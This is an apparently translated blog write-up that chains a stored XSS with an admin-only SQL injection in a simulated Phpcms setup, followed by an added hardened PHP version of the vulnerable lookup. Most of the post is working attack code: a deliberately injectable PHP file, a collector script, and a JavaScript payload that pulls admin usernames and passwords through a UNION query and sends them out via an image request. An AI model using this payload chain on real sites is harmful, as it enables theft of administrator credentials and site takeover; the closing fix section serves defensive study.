Yesterday I saw the disclosure of an XSS in Phpcms v9.1.15 and of an SQL injection that I have no access to, so I wanted to test using the XSS to execute the SQL injection, although the disclosed Phpcms vulnerabilities have many other uses! However, I could not find a copy of Phpcms v9.1.15 to test this injection on, and testing on other versions did not succeed!
So I have to assume the following extreme environment:
1. The front end has exactly one XSS vulnerability (the administrator cookie cannot be obtained)
2. The back end has exactly one SQL injection vulnerability (only administrators can access the vulnerable file)
3. The admin password obtained through the injection can be decrypted
4. Apart from the above, there are no other vulnerabilities (including getting a webshell from the back end)
In fact, I just want to say that the only option left is to use this XSS to execute the injection!
Simulated injection vulnerability code
- sqli.php
<?php
@error_reporting(E_ALL & ~E_NOTICE & ~E_WARNING); // ignore notices and warnings
// Note: the mysql_* functions are the legacy MySQL extension (removed in PHP 7).
$con = mysql_connect("localhost", "root", "");
if (!$con) { die('Could not connect: ' . mysql_error()); }
mysql_select_db("test", $con);
$id = $_GET['xss']; // request parameter, used unfiltered
$sql = "select id,realname from test where id=" . $id; // deliberately injectable: $id is concatenated into the query
$view = mysql_query($sql);
$row = mysql_fetch_array($view);
echo $row['id'] . "<br/>";
echo $row['realname'] . "<br/>";
?>
- MySQL database:
database: test
table: test, admin
column: test.id, test.realname
        admin.id, admin.username, admin.password
- get.php (captures the injected data)
<?php
$file = fopen("data.txt", "a"); // open the capture file in append mode
fwrite($file, $_GET['get']);    // write whatever arrives in the "get" parameter
fclose($file);
?>
- xsssqli.js (payload)
function addLoadEvent(func) // lets window.onload run multiple functions
{
    var oldfunc = window.onload; // handler already registered for page load, if any
    if (typeof (window.onload) != "function")
    {
        window.onload = func;
    }
    else
    {
        window.onload = function ()
        {
            oldfunc();
            func();
        }
    }
}
function get_xsssqli()
{
    // Same-origin request to the admin-only file, sent from the administrator's browser
    var url = "http://127.0.0.1/xss/sqli.php?xss=1%20and%201=2%20union%20select%20username,password%20from%20admin";
    var ajax = null;
    if (window.XMLHttpRequest)
    {
        ajax = new XMLHttpRequest();
    }
    else if (window.ActiveXObject)
    {
        ajax = new ActiveXObject("Microsoft.XMLHTTP"); // IE6 and older versions
    }
    else
    {
        return;
    }
    ajax.open("GET", url, true);
    ajax.send(null);
    ajax.onreadystatechange = function ()
    {
        if (ajax.readyState == 4 && ajax.status == 200)
        {
            // Pass the response body to get.php through an image request
            var img = document.createElement("img");
            img.src = "http://127.0.0.1/xss/get.php?get=" + ajax.responseText;
            document.body.appendChild(img);
        }
    }
}
addLoadEvent(get_xsssqli);
- Simulated XSS vulnerability
<html>
<head>
<title>use XSS to Sqli</title>
</head>
<body>
<script src=http://127.0.0.1/xss/get.js></script>
</body>
</html>
Finally the data was successfully obtained:
Of course, you can also write a regular expression to extract only the specified data! From: http://superman.php100.com/
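Restricting sqli.php to administrators does not protect it here, because the injected request is sent from the administrator's own browser session; the injection itself has to be removed. The following is an added example, not code from the original post: the same lookup with the id validated and bound as a parameter, run against an in-memory SQLite database with constructed rows instead of the post's MySQL setup (the function names lookup_realname and render are hypothetical).

```php
<?php
// Added example: the lookup from sqli.php, hardened. Not the original author's code.
// Assumption: an in-memory SQLite database with constructed rows replaces MySQL
// so the script runs offline; table and column names follow the post's schema.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE test  (id INTEGER PRIMARY KEY, realname TEXT)");
$pdo->exec("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$pdo->exec("INSERT INTO test  VALUES (1, 'Alice <Example>')");           // constructed row
$pdo->exec("INSERT INTO admin VALUES (1, 'admin', 'constructed-hash')"); // constructed row

// Returns the matching row, or null when the id is invalid or unknown.
function lookup_realname(PDO $pdo, $rawId): ?array
{
    // 1. Strict validation: only a positive integer is accepted as an id.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Bound parameter: the value never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT id, realname FROM test WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Encode on output so stored data cannot turn into markup in the page.
function render(?array $row): string
{
    if ($row === null) {
        return "invalid id\n";
    }
    return htmlspecialchars((string)$row['id'], ENT_QUOTES, 'UTF-8') . "<br/>\n"
         . htmlspecialchars($row['realname'], ENT_QUOTES, 'UTF-8') . "<br/>\n";
}

// First input: the xss parameter from the post's URL, URL-decoded. Second: a normal id.
$inputs = ['1 and 1=2 union select username,password from admin', '1'];
foreach ($inputs as $input) {
    echo render(lookup_realname($pdo, $input));
}
```

The value taken from the post's URL is rejected as an invalid id, while the id 1 returns its row with the angle brackets in realname HTML-encoded.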